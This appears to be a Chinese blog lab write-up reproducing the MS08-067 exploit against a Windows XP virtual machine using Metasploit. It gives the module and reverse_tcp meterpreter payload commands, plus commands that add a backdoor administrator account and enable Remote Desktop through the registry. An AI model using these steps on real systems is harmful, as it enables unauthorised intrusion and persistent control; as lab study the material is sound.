MS08_067复现+远程控制

环境

主机 ip
kali Linux 192.168.252.128
Windows xp 192.168.252.148

漏洞介绍

https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2008/ms08-067

Metasploit渗透测试模块

Metasploit介绍及命令:https://blog.csdn.net/qq_39583774/article/details/119144119

渗透


nmap -sV 192.168.252.148
msfconsole

MS08_067复现+远程控制_第1张图片

search ms08_067 #搜索
use exploit/windows/smb/ms08_067_netapi #选择模块
set payload windows/meterpreter/reverse_tcp #攻击模块装载
set rhost 192.168.252.148 #设置攻击目标ip
set lhost 192.168.252.128 #设置kali ip
set target 7 #选择对应的版本 show targets可查看版本  set target+版本序号  选择版本这里是xp英文版所以选择7
run

MS08_067复现+远程控制_第2张图片
MS08_067复现+远程控制_第3张图片

出现错误

在这里插入图片描述
解决
windows xp上操作
windos+R #打开运行
gpedit.msc
MS08_067复现+远程控制_第4张图片
点击应用确定
MS08_067复现+远程控制_第5张图片
打开服务
MS08_067复现+远程控制_第6张图片
MS08_067复现+远程控制_第7张图片
MS08_067复现+远程控制_第8张图片
回到kali 继续运行run
MS08_067复现+远程控制_第9张图片
如出现乱码chcp 65001 解决。

远程操作

MS08_067复现+远程控制_第10张图片
MS08_067复现+远程控制_第11张图片
这里只能查看不能操作
MS08_067复现+远程控制_第12张图片

net user admin 123456 /add  #添加新用户
net localgroup administrators admin /add #将用户加入administrators组
开启远程桌面:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

MS08_067复现+远程控制_第13张图片

rdesktop 192.168.252.148 #开启远程桌面,这里必须在图像化界面上

在这里插入图片描述
因为这里是xp家庭版无法开启,如果是专业版应该是可以的。

你可能感兴趣的:(msf,kali,linux,安全漏洞,windows,xp,安全)